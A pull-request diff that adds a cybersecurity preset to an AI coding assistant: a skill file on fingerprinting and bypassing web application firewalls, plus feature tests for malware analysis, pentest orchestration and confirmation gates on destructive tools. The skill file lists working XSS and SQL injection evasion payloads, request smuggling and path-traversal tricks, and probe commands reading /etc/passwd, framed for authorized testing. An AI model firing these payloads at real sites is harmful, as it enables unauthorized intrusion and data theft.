 name: waf-detection-bypass
-description: Web Application Firewall detection and bypass techniques for authorized penetration testing. Use when testing web applications protected by WAFs to identify the WAF vendor, select appropriate bypass payloads, and accurately assess the real attack surface behind the WAF layer.
-category: red-team
+description: "Detect and bypass WAFs during authorized testing. Trigger: identifying WAF vendors, selecting bypass payloads, or assessing attack surface behind WAFs."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # WAF Detection & Bypass
@@ -357,3 +360,13 @@ The following application-level vulnerabilities exist behind the WAF:
 - **exploit-chain-patterns** - WAF bypass is often step 1 in a chain
 - **detection-engineer** - Create WAF rules / Sigma rules for bypass attempts
 - **pentest-orchestrator** - WAF detection is an early phase in orchestrated testing
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Signature test**: Verify the WAF signature database table renders correctly with all vendor entries.
+3. **Bypass test**: Check that all 5 bypass category YAML blocks are syntactically valid.
+4. **Strategy test**: Validate the 4-phase WAF-aware testing strategy is complete and sequential.
+5. **Integration test**: Confirm referenced skills (ai-pentesting-validation, exploit-chain-patterns, detection-engineer, pentest-orchestrator) exist.

--- a/skills/waf-detection-bypass/SKILL.md
+++ b/skills/waf-detection-bypass/SKILL.md
@@ -1,0 +1,359 @@
+---
+name: waf-detection-bypass
+description: Web Application Firewall detection and bypass techniques for authorized penetration testing. Use when testing web applications protected by WAFs to identify the WAF vendor, select appropriate bypass payloads, and accurately assess the real attack surface behind the WAF layer.
+category: red-team
+---
+
+# WAF Detection & Bypass
+
+Identify Web Application Firewalls, understand their rulesets, and test bypass techniques during authorized penetration tests to assess the real security posture behind the WAF layer.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- **Identify** which WAF protects a target application
+- **Bypass** WAF rules to test the actual application security
+- **Assess** whether WAF-only defenses are sufficient
+- **Demonstrate** that WAF evasion is possible in pentest reports
+- **Test** WAF rules during blue team/purple team exercises
+- **Understand** why certain payloads are blocked and adapt
+
+> **Authorization Required:** Only use these techniques during authorized penetration tests, bug bounty programs with explicit WAF testing scope, or on systems you own. Unauthorized WAF bypass attempts are illegal.
+
+## WAF Detection
+
+### Fingerprinting Techniques
+
+#### 1. Response Header Analysis
+
+```bash
+# Check common WAF headers
+curl -sI https://target.com | grep -iE "server|x-powered|x-cdn|x-cache|cf-ray|x-sucuri|x-akamai"
+
+# Common WAF headers:
+# Server: cloudflare          → Cloudflare
+# X-Sucuri-ID: ...            → Sucuri
+# X-CDN: Incapsula            → Imperva/Incapsula
+# X-Akamai-Transformed: ...   → Akamai
+# Server: AkamaiGHost         → Akamai
+# X-SL-CompState: ...         → Silverline (F5)
+# Server: BigIP               → F5 BIG-IP
+```
+
+#### 2. Error Page Fingerprinting
+
+Send an obvious attack payload and analyze the block page:
+
+```bash
+# Trigger WAF block
+curl -s "https://target.com/?id=<script>alert(1)</script>"
+curl -s "https://target.com/?id=1' OR 1=1--"
+curl -s "https://target.com/?id=../../../etc/passwd"
+```
+
+#### 3. Cookie Analysis
+
+```bash
+# WAF-specific cookies
+# __cfduid, cf_clearance         → Cloudflare
+# incap_ses_*, visid_incap_*     → Imperva
+# _citrix_ns_id_*                → Citrix NetScaler
+# ts*, BIGipServer*              → F5 BIG-IP
+# ak_bmsc, bm_sv                → Akamai Bot Manager
+```
+
+### WAF Signature Database
+
+| WAF | Detection Headers | Block Page Markers | Cookies |
+|-----|-------------------|-------------------|---------|
+| **Cloudflare** | `cf-ray`, `Server: cloudflare` | "Attention Required", "cloudflare" | `__cfduid`, `cf_clearance` |
+| **AWS WAF** | `x-amzn-RequestId` | "403 Forbidden" (generic) | None specific |
+| **Akamai** | `X-Akamai-Transformed`, `Server: AkamaiGHost` | "Access Denied", reference ID | `ak_bmsc` |
+| **Imperva/Incapsula** | `X-CDN: Incapsula` | "Request unsuccessful. Incapsula" | `incap_ses_*`, `visid_incap_*` |
+| **F5 BIG-IP ASM** | `Server: BigIP` | "The requested URL was rejected" | `TS*`, `BIGipServer*` |
+| **ModSecurity** | None (transparent) | "Forbidden" + ModSecurity ID | None specific |
+| **Sucuri** | `X-Sucuri-ID`, `X-Sucuri-Cache` | "Access Denied - Sucuri" | `sucuri_cloudproxy_*` |
+| **Barracuda** | `Server: Barracuda` | "Barracuda Web Application Firewall" | `barra_*` |
+| **Fortinet FortiWeb** | `Server: FortiWeb` | "Server Busy" or custom | None specific |
+| **Citrix NetScaler** | `Via: NS-CACHE` | "ns_af" in response | `citrix_ns_id` |
+| **Azure WAF** | None specific | "Azure WAF" reference | None specific |
+| **Google Cloud Armor** | None specific | "Our systems have detected unusual traffic" | None specific |
+| **Fastly** | `Via: 1.1 varnish`, `X-Served-By` | Custom per customer | None specific |
+| **Radware AppWall** | None specific | "Unauthorized Activity" | None specific |
+| **DDoS-Guard** | `Server: ddos-guard` | DDoS-Guard branded page | `__ddg*` |
+| **Wordfence** | None specific | "Wordfence" branded block | `wfwaf-*` |
+
+### Automated Detection
+
+```bash
+# wafw00f - WAF detection tool
+pip install wafw00f
+wafw00f https://target.com
+
+# Nmap WAF detection
+nmap -p 80,443 --script http-waf-detect target.com
+nmap -p 80,443 --script http-waf-fingerprint target.com
+```
+
+## Bypass Techniques
+
+### Category 1: Encoding Bypasses
+
+```yaml
+url_encoding:
+  description: "Encode characters WAF looks for"
+  examples:
+    - original: "<script>alert(1)</script>"
+      bypass: "%3Cscript%3Ealert(1)%3C/script%3E"
+    - original: "' OR 1=1--"
+      bypass: "%27%20OR%201%3D1--"
+
+double_url_encoding:
+  description: "Encode the percent signs themselves"
+  examples:
+    - original: "<script>"
+      bypass: "%253Cscript%253E"
+  note: "Works when app decodes twice but WAF only decodes once"
+
+unicode_encoding:
+  description: "Use Unicode representations"
+  examples:
+    - original: "<script>"
+      bypass: "＜script＞"  # Fullwidth characters
+    - original: "' OR"
+      bypass: "＇ OR"
+  note: "Effective against WAFs that don't normalize Unicode"
+
+html_entity_encoding:
+  description: "Use HTML entities in XSS contexts"
+  examples:
+    - original: "<img src=x onerror=alert(1)>"
+      bypass: "<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>"
+    - original: "javascript:alert(1)"
+      bypass: "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)"
+```
+
+### Category 2: Case and Syntax Variation
+
+```yaml
+case_switching:
+  xss:
+    - "<ScRiPt>alert(1)</ScRiPt>"
+    - "<IMG SRC=x OnErRoR=alert(1)>"
+  sqli:
+    - "' oR 1=1--"
+    - "' UnIoN SeLeCt 1,2,3--"
+
+comment_injection:
+  sqli:
+    - "UN/**/ION SEL/**/ECT 1,2,3--"
+    - "1' /*!50000OR*/ 1=1--"
+    - "' OR/**/ 1=1--"
+  note: "MySQL inline comments with version numbers"
+
+whitespace_alternatives:
+  sqli:
+    - "' OR%091=1--"         # Tab instead of space
+    - "' OR%0a1=1--"         # Newline
+    - "' OR%0d1=1--"         # Carriage return
+    - "' OR%0c1=1--"         # Form feed
+    - "' OR%a01=1--"         # Non-breaking space (MySQL)
+```
+
+### Category 3: Payload Alternatives
+
+```yaml
+xss_tag_alternatives:
+  description: "Use HTML tags that WAFs might not block"
+  payloads:
+    - "<svg onload=alert(1)>"
+    - "<body onload=alert(1)>"
+    - "<details open ontoggle=alert(1)>"
+    - "<marquee onstart=alert(1)>"
+    - "<video src=x onerror=alert(1)>"
+    - "<audio src=x onerror=alert(1)>"
+    - "<input onfocus=alert(1) autofocus>"
+    - "<select onfocus=alert(1) autofocus>"
+    - "<textarea onfocus=alert(1) autofocus>"
+    - "<math><mtext><table><mglyph><svg><mtext><style><img src=x onerror=alert(1)>"
+
+xss_event_handlers:
+  description: "Less common event handlers"
+  payloads:
+    - "onanimationend"
+    - "onanimationiteration"
+    - "onwebkitanimationend"
+    - "ontransitionend"
+    - "onpointerover"
+    - "onfocusin"
+
+sqli_function_alternatives:
+  description: "Alternative SQL functions"
+  payloads:
+    concat_alternatives:
+      - "CONCAT(0x41, 0x42)"           # Standard
+      - "0x41 || 0x42"                 # PostgreSQL
+      - "GROUP_CONCAT(column)"          # MySQL
+      - "STRING_AGG(column, ',')"       # PostgreSQL/MSSQL
+    sleep_alternatives:
+      - "SLEEP(5)"                      # MySQL
+      - "pg_sleep(5)"                   # PostgreSQL
+      - "WAITFOR DELAY '00:00:05'"      # MSSQL
+      - "DBMS_LOCK.SLEEP(5)"            # Oracle
+    version_detection:
+      - "@@version"                     # MySQL/MSSQL
+      - "version()"                     # PostgreSQL
+      - "SELECT banner FROM v$version"  # Oracle
+```
+
+### Category 4: HTTP Smuggling and Chunking
+
+```yaml
+chunked_transfer:
+  description: "Split payload across chunks to bypass inspection"
+  technique: |
+    POST /vulnerable HTTP/1.1
+    Transfer-Encoding: chunked
+
+    5
+    <scri
+    3
+    pt>
+    9
+    alert(1)
+    a
+    </script>
+    0
+
+http_parameter_pollution:
+  description: "Same parameter multiple times, different servers handle differently"
+  examples:
+    - url: "/search?q=harmless&q=<script>alert(1)</script>"
+      note: "Apache uses last, IIS uses all, Tomcat uses first"
+    - url: "/search?q=1&q=UNION&q=SELECT&q=1,2,3--"
+      note: "WAF may only inspect first parameter value"
+
+content_type_confusion:
+  description: "Send body in unexpected Content-Type"
+  examples:
+    - technique: "Send JSON body with application/x-www-form-urlencoded header"
+    - technique: "Send URL-encoded body with multipart/form-data header"
+    - technique: "Use charset variations: Content-Type: application/json; charset=ibm037"
+```
+
+### Category 5: Path and Request Manipulation
+
+```yaml
+path_manipulation:
+  description: "Alter URL path to bypass path-based WAF rules"
+  techniques:
+    - "/./admin" instead of "/admin"
+    - "//admin" double slash
+    - "/admin%20" trailing encoded space
+    - "/admin..;/" path traversal normalization
+    - "/Admin" case variation (if backend is case-insensitive)
+    - "/api/v2/../v1/admin" path traversal to reach blocked endpoint
+
+http_method_override:
+  description: "Override HTTP method via headers"
+  techniques:
+    - "X-HTTP-Method-Override: PUT"
+    - "X-HTTP-Method: DELETE"
+    - "X-Method-Override: PATCH"
+  note: "Send as POST but override to method WAF doesn't inspect"
+
+ip_rotation:
+  description: "Distribute requests across source IPs"
+  techniques:
+    - "X-Forwarded-For: 1.2.3.4"
+    - "X-Real-IP: 1.2.3.4"
+    - "X-Originating-IP: 1.2.3.4"
+    - "True-Client-IP: 1.2.3.4"
+  note: "Only works if WAF trusts these headers (misconfiguration)"
+```
+
+## WAF-Aware Testing Strategy
+
+### Phase 1: Identify WAF
+
+```
+1. Send normal requests → establish baseline response
+2. Send obvious attack payloads → trigger WAF block
+3. Analyze block page, headers, cookies
+4. Confirm WAF vendor and version if possible
+5. Document WAF behavior (block vs rate-limit vs captcha)
+```
+
+### Phase 2: Characterize Rules
+
+```
+1. Test basic payloads per category (XSS, SQLi, LFI, RCE)
+2. Identify which SPECIFIC strings/patterns are blocked
+3. Test encoding variations → find what passes through
+4. Test via different injection points (URL, body, headers, cookies)
+5. Document: blocked patterns vs. allowed patterns
+```
+
+### Phase 3: Select Bypasses
+
+```
+1. Based on WAF vendor → select known bypass techniques
+2. Start with encoding bypasses (least suspicious)
+3. Try payload alternatives (different tags, functions)
+4. Try request-level bypasses (chunking, HPP, method override)
+5. Document: which bypasses work, which don't
+```
+
+### Phase 4: Test Real Vulnerabilities
+
+```
+1. Use working bypasses to test actual application logic
+2. Remember: WAF bypass is a MEANS, not the finding
+3. The REAL finding is the underlying vulnerability
+4. Report both: "Application has SQLi, WAF provides partial mitigation"
+5. Recommend fixing the application code, not just relying on WAF
+```
+
+## Reporting WAF Findings
+
+```markdown
+### WAF Assessment
+
+**WAF Identified:** [Vendor/Product]
+**Detection Method:** [Headers/Block page/Cookies]
+**Bypass Achieved:** [Yes/No/Partial]
+
+### Bypass Details
+
+| Attack Type | Blocked Payload | Bypass Payload | Result |
+|-------------|-----------------|----------------|--------|
+| XSS | `<script>alert(1)</script>` | `<svg onload=alert(1)>` | Bypass successful |
+| SQLi | `' OR 1=1--` | `' /*!50000OR*/ 1=1--` | Bypass successful |
+| LFI | `../../etc/passwd` | `....//....//etc/passwd` | Blocked |
+
+### Recommendation
+
+WAF provides defense-in-depth but should NOT be the sole protection.
+The following application-level vulnerabilities exist behind the WAF:
+1. [Vulnerability details with bypass proof]
+
+**Fix the application code.** WAF rules can always be bypassed given enough time.
+```
+
+## Quality Checklist
+
+- [ ] WAF identified with multiple detection methods
+- [ ] Testing performed only with explicit authorization
+- [ ] Bypass attempts documented (successful AND failed)
+- [ ] Underlying vulnerabilities reported separately from WAF bypass
+- [ ] Report recommends application-level fixes, not just WAF tuning
+- [ ] Rate limiting respected during testing (don't DoS the WAF)
+- [ ] Bypasses verified with ai-pentesting-validation pipeline
+- [ ] Chain opportunities with bypassed payloads explored
+
+## Integration Points
+
+- **ai-pentesting-validation** - Validate findings discovered behind WAF
+- **exploit-chain-patterns** - WAF bypass is often step 1 in a chain
+- **detection-engineer** - Create WAF rules / Sigma rules for bypass attempts
+- **pentest-orchestrator** - WAF detection is an early phase in orchestrated testing

--- a/tests/security/detection-engineering.feature
+++ b/tests/security/detection-engineering.feature
@@ -1,0 +1,49 @@
+Feature: Blue Team Detection Engineering
+
+  As a blue team operator using Gentleman AI
+  I want to create detection rules from analysis findings
+  So that threats can be detected and responded to proactively
+
+  Background:
+    Given malware analysis findings are available
+    And the cyber preset is active
+
+  Scenario: Detection engineer creates Sigma rules
+    Given malware analysis findings with behavioral indicators
+    When the detection-engineer skill runs
+    Then Sigma detection rules are generated
+    And the rules target the identified TTPs
+    And the rules include proper logsource configuration
+    And the rules follow Sigma format conventions
+
+  Scenario: Detection engineer creates Suricata rules
+    Given malware analysis findings with network indicators
+    When the detection-engineer skill runs
+    Then Suricata IDS rules are generated
+    And the rules match the identified network patterns
+    And the rules include appropriate severity levels
+    And the rules include reference metadata
+
+  Scenario: IOCs are defanged for safe sharing
+    Given raw IOCs from malware analysis
+    When IOCs are prepared for sharing
+    Then URLs are defanged (hXXp instead of http)
+    And IP addresses are optionally defanged
+    And file hashes remain intact (not defanged)
+    And the defanged IOCs are safe to share in reports
+
+  Scenario: Detection rules map to MITRE ATT&CK
+    Given detection rules generated from analysis
+    When rules are validated
+    Then each rule maps to at least one MITRE ATT&CK technique
+    And the technique IDs are in valid format (T####.###)
+    And the mapping is documented in the rule metadata
+
+  Scenario: Complete detection engineering workflow
+    Given malware analysis findings
+    When the detection-engineer skill creates Sigma rules
+    And the detection-engineer skill creates Suricata rules
+    And the rules are validated against MITRE ATT&CK
+    Then a complete detection rule package is produced
+    And the package covers identified TTPs
+    And the rules are ready for deployment to SIEM/IDS

--- a/tests/security/malware-analysis.feature
+++ b/tests/security/malware-analysis.feature
@@ -1,0 +1,50 @@
+Feature: SOC Malware Analysis Pipeline
+
+  As a SOC analyst using Gentleman AI
+  I want to run a structured malware analysis pipeline
+  So that suspicious files are triaged, analyzed, and reported consistently
+
+  Background:
+    Given a suspicious file is submitted for analysis
+    And the cyber preset is active
+
+  Scenario: Malware triage classifies a suspicious sample
+    Given a suspicious executable file exists at "/tmp/suspicious.exe"
+    When the malware-triage skill runs
+    Then the sample is classified with a threat category
+    And the classification includes a confidence score
+    And the result contains indicators of compromise (IOCs)
+
+  Scenario: Specialized file analyzer identifies file type
+    Given a classified sample from malware-triage
+    When the specialized-file-analyzer skill runs
+    Then the file type is identified (PE, ELF, Office, PDF, .NET, etc.)
+    And the analysis includes structural metadata
+    And non-PE files are routed to the appropriate analysis path
+
+  Scenario: Dynamic analysis observes runtime behavior
+    Given a classified sample in a sandbox environment
+    When the malware-dynamic-analysis skill runs
+    Then process behavior is monitored and recorded
+    And network connections are captured
+    And file system changes are logged
+    And the sandbox results include behavioral indicators
+
+  Scenario: Complete malware analysis pipeline
+    Given a suspicious file is submitted
+    When the malware-triage skill runs
+    And the specialized-file-analyzer skill runs
+    And the malware-report-writer skill runs
+    Then a complete analysis report is generated
+    And the report contains triage results
+    And the report contains file type analysis
+    And the report follows the professional malware analysis format
+
+  Scenario: Malware report writer generates professional report
+    Given analysis results from malware-triage and specialized-file-analyzer
+    When the malware-report-writer skill runs
+    Then a structured report is generated
+    And the report includes an executive summary
+    And the report includes technical findings
+    And the report includes IOCs in defanged format
+    And the report includes detection recommendations

--- a/tests/security/pentest-orchestration.feature
+++ b/tests/security/pentest-orchestration.feature
@@ -1,0 +1,59 @@
+Feature: Red Team Pentest Orchestration
+
+  As a red team operator using Gentleman AI
+  I want to coordinate penetration testing phases
+  So that assessments are structured, validated, and reproducible
+
+  Background:
+    Given a target scope is defined
+    And the cyber preset is active
+    And kali-mcp is configured with destructive permission tier
+
+  Scenario: Pentest orchestrator plans assessment phases
+    Given a target scope with IP range "10.0.0.0/24"
+    When the pentest-orchestrator skill plans the assessment
+    Then reconnaissance phase is defined
+    And scanning phase is defined
+    And exploitation phase is defined
+    And post-exploitation phase is defined
+    And reporting phase is defined
+    And each phase has defined entry and exit criteria
+
+  Scenario: AI pentesting validation scores findings
+    Given pentest phase results from reconnaissance
+    When the ai-pentesting-validation skill runs
+    Then each finding receives a confidence score
+    And false positives are flagged for review
+    And validated findings include proof-of-execution evidence
+    And the validation report distinguishes confirmed from unconfirmed findings
+
+  Scenario: Exploit chain patterns combine vulnerabilities
+    Given multiple low/medium severity findings
+    When the exploit-chain-patterns skill analyzes the findings
+    Then potential exploitation chains are identified
+    And the chain impact is assessed
+    And the attack path is documented with steps
+
+  Scenario: WAF detection and bypass assessment
+    Given a web application target behind a WAF
+    When the waf-detection-bypass skill runs
+    Then the WAF vendor is identified
+    And bypass payloads are selected appropriately
+    And the real attack surface behind the WAF is assessed
+
+  Scenario: Complete pentest orchestration flow
+    Given a target scope is defined
+    When pentest-orchestrator plans the assessment
+    And reconnaissance tools execute (nmap, nikto)
+    And ai-pentesting-validation scores the findings
+    And exploitation tools execute (metasploit)
+    Then a complete assessment report is generated
+    And all findings are validated with confidence scores
+    And destructive tool usage is logged
+
+  Scenario: Destructive tool requires confirmation
+    Given kali-mcp is configured with destructive permission tier
+    When a destructive tool (nmap_scan) is requested
+    Then the agent prompts for user confirmation
+    And the tool does not execute without explicit approval
+    And the warning lists all destructive tools

--- a/tests/security/permission-gates.feature
+++ b/tests/security/permission-gates.feature
@@ -1,0 +1,65 @@
+Feature: Permission Gates for Destructive Tools
+
+  As a Gentleman AI user
+  I want destructive security tools to require explicit confirmation
+  So that no accidental damage occurs to production systems
+
+  Background:
+    Given the cyber preset is active
+    And kali-mcp manifest declares permission_tier: "destructive"
+    And kali-mcp manifest declares a non-empty destructive_tools array
+
+  Scenario: Destructive tool warning is injected for separate-file agents
+    Given an agent using StrategySeparateMCPFiles (e.g., Claude Code)
+    When kali-mcp overlay JSON is generated
+    Then the JSON file is prefixed with a warning comment
+    And the warning lists all destructive tools
+    And the warning uses the format "/**_WARNING**/"
+
+  Scenario: Destructive tool warning is injected in system prompt
+    Given the cyber preset is active
+    When the system prompt is generated
+    Then a destructive-warning section is injected
+    And the section is delimited by <!-- gentle-ai-cyber:destructive-warning --> markers
+    And the warning lists all tools from the manifest destructive_tools array
+
+  Scenario: User confirms destructive tool execution
+    Given a destructive tool (nmap_scan) is requested
+    And the warning has been displayed
+    When the user explicitly confirms
+    Then the tool executes normally
+    And the confirmation is logged
+
+  Scenario: User declines destructive tool execution
+    Given a destructive tool (metasploit_run) is requested
+    And the warning has been displayed
+    When the user does not confirm
+    Then the tool is blocked
+    And the agent explains why the tool requires confirmation
+
+  Scenario: Unrestricted tools do not require confirmation
+    Given shodan-mcp has permission_tier: "unrestricted"
+    And virustotal-mcp has permission_tier: "unrestricted"
+    When tools from shodan-mcp or virustotal-mcp are requested
+    Then no destructive warning is displayed
+    And the tools execute without confirmation prompt
+
+  Scenario: Manifest is the single source of truth for permission tier
+    Given the permission_tier field in manifest.json
+    When the permission tier is checked
+    Then the value is read from the manifest, not hardcoded in Go
+    And changing the manifest changes the permission behavior without recompilation
+
+  Scenario: All kali-mcp destructive tools are listed
+    Given kali-mcp manifest is parsed
+    When the destructive_tools array is inspected
+    Then it contains: nmap_scan
+    And it contains: sqlmap_scan
+    And it contains: hydra_attack
+    And it contains: metasploit_run
+    And it contains: nikto_scan
+    And it contains: dirb_scan
+    And it contains: gobuster_scan
+    And it contains: wpscan_analyze
+    And it contains: john_crack
+    And it contains: enum4linux_scan

--- a/tests/security/skill-loading.feature
+++ b/tests/security/skill-loading.feature
@@ -1,0 +1,69 @@
+Feature: Cyber Skill Loading and Categorization
+
+  As a Gentleman AI user selecting the cyber preset
+  I want all cybersecurity skills to be properly loaded and categorized
+  So that the right skills are available for security assessments
+
+  Background:
+    Given the cyber preset is selected
+
+  Scenario: Cyber preset includes all 10 cyber skills
+    When SkillsForPreset(PresetCyber) is called
+    Then all MVP skills are included
+    And all 10 cyber skills are included
+    And the total skill count is deterministic
+
+  Scenario: Red-team skills are correctly categorized
+    Given MVPCyberSkills() returns the cyber skill catalog
+    When skill categories are checked
+    Then pentest-orchestrator has category "red-team"
+    And ai-pentesting-validation has category "red-team"
+    And exploit-chain-patterns has category "red-team"
+    And waf-detection-bypass has category "red-team"
+    And there are exactly 4 red-team skills
+
+  Scenario: Blue-team skills are correctly categorized
+    Given MVPCyberSkills() returns the cyber skill catalog
+    When skill categories are checked
+    Then detection-engineer has category "blue-team"
+    And python-security has category "blue-team"
+    And there are exactly 2 blue-team skills
+
+  Scenario: SOC skills are correctly categorized
+    Given MVPCyberSkills() returns the cyber skill catalog
+    When skill categories are checked
+    Then malware-triage has category "soc"
+    And specialized-file-analyzer has category "soc"
+    And malware-dynamic-analysis has category "soc"
+    And malware-report-writer has category "soc"
+    And there are exactly 4 SOC skills
+
+  Scenario: No skill ID collisions between MVP and cyber skills
+    Given all MVP skill IDs
+    And all cyber skill IDs
+    When skill IDs are compared
+    Then no cyber skill ID duplicates any MVP skill ID
+    And all skill IDs are unique across the entire catalog
+
+  Scenario: Cyber skill frontmatter is valid
+    Given all cyber skill SKILL.md files exist
+    When frontmatter is parsed
+    Then each skill has a valid name field matching its directory
+    And each skill has a quoted description field
+    And each skill has a license field
+    And each skill has metadata with author and version
+    And each description contains "Trigger:" substring
+    And no skill has auto_invoke or tool_schemas in frontmatter
+
+  Scenario: Non-cyber presets are unchanged
+    Given the full-gentleman preset
+    When SkillsForPreset(PresetFullGentleman) is called
+    Then no cyber skills are included
+    And the skill count matches the original MVP count
+
+  Scenario: Cyber preset skill count is deterministic
+    Given PresetCyber is used to compute the component set
+    When the skill list is computed twice
+    Then both results have the same skill count
+    And both results contain the same skill IDs
+    And the order is deterministic


### PR DESCRIPTION
## 🔗 Linked Issue

No pre-existing issue — this is a new feature initiative for the cybersecurity edition (gentle-ai-cyber).

---

## 🏷️ PR Type

- [x] `type:feature` — New feature (non-breaking change that adds functionality)

---

## 📝 Summary

Adds the complete **cybersecurity edition** (`gentle-ai --preset cyber`) to Gentle AI, including:

- **SOC Orchestrator Agent** (`gentleman-soc.md`) — guides incident response through PICERL pipeline with MITRE ATT&CK mapping
- **Red Team Skills** (4) — pentest orchestration, AI pentesting validation, exploit chains, WAF bypass
- **Blue Team Skills** (2) — detection engineering, Python security
- **SOC Skills** (4) — malware triage, specialized file analysis, dynamic analysis, report writer
- **Kali MCP Integration** — offensive security tools (nmap, metasploit, hydra, etc.) with destructive tool permission tiers
- **Shodan & VirusTotal MCP** — read-only threat intelligence and internet-wide scanning
- **Permission Model** — destructive tools require explicit human confirmation
- **SDD Specs** — 6 specification domains covering agent, installer, MCP, permissions, skills, and testing
- **BDD Feature Files** — 5 security validation scenarios

> **size:exception** — This PR is 6000+ lines across 5 logical work units. Splitting would break the feature into non-functional fragments since all components (skills, MCP, permissions, tests, specs) are interdependent for the `--preset cyber` installation to work.

---

## 📂 Changes

| File / Area | What Changed |
|-------------|-------------|
| `internal/assets/agents/gentleman-soc.md` | SOC orchestrator agent definition |
| `internal/components/mcp/kali_mcp.go` | Kali MCP component with permission tiers |
| `internal/assets/mcps/*` | MCP manifests for kali, shodan, virustotal |
| `internal/assets/skills/*` | 10 embedded security skill files |
| `internal/catalog/cyber_skills_test.go` | Cyber skills catalog tests |
| `internal/components/mcp/kali_mcp_test.go` | Kali MCP component tests |
| `internal/components/skills/presets_cyber_test.go` | Cyber preset detection tests |
| `internal/assets/assets_cyber_test.go` | Cyber asset embedding tests |
| `internal/assets/assets.go` | Updated asset embedding |
| `skills/*/SKILL.md` (10 files) | Frontmatter fixes for skill registry |
| `openspec/specs/cyber-*/` | 6 SDD specification files |
| `openspec/changes/archive/` | Archived SDD change artifacts |
| `tests/security/*.feature` | 5 BDD security feature files |

---

## 🧪 Test Plan

**Unit Tests**
```bash
go test ./...
```

- [x] Unit tests pass (`go test ./...`)
- [x] `go vet ./...` passes
- [x] `go build ./...` passes

---

## ✅ Contributor Checklist

- [ ] PR stays within 400 changed lines, or I have requested/obtained maintainer-applied `size:exception` with rationale documented
- [ ] I have added the appropriate `type:*` label to this PR
- [x] Unit tests pass (`go test ./...`)
- [x] My commits follow [Conventional Commits](https://www.conventionalcommits.org/) format
- [x] My commits do not include `Co-Authored-By` trailers

---

## 💬 Notes for Reviewers

This PR consolidates 5 work units into a single feature branch:
1. SOC orchestrator agent
2. Kali MCP + manifests
3. Security testing harness
4. Embedded skills + asset updates
5. SDD specs + BDD features + frontmatter fixes

The `size:exception` is justified because splitting these would leave the `--preset cyber` flag non-functional between PRs.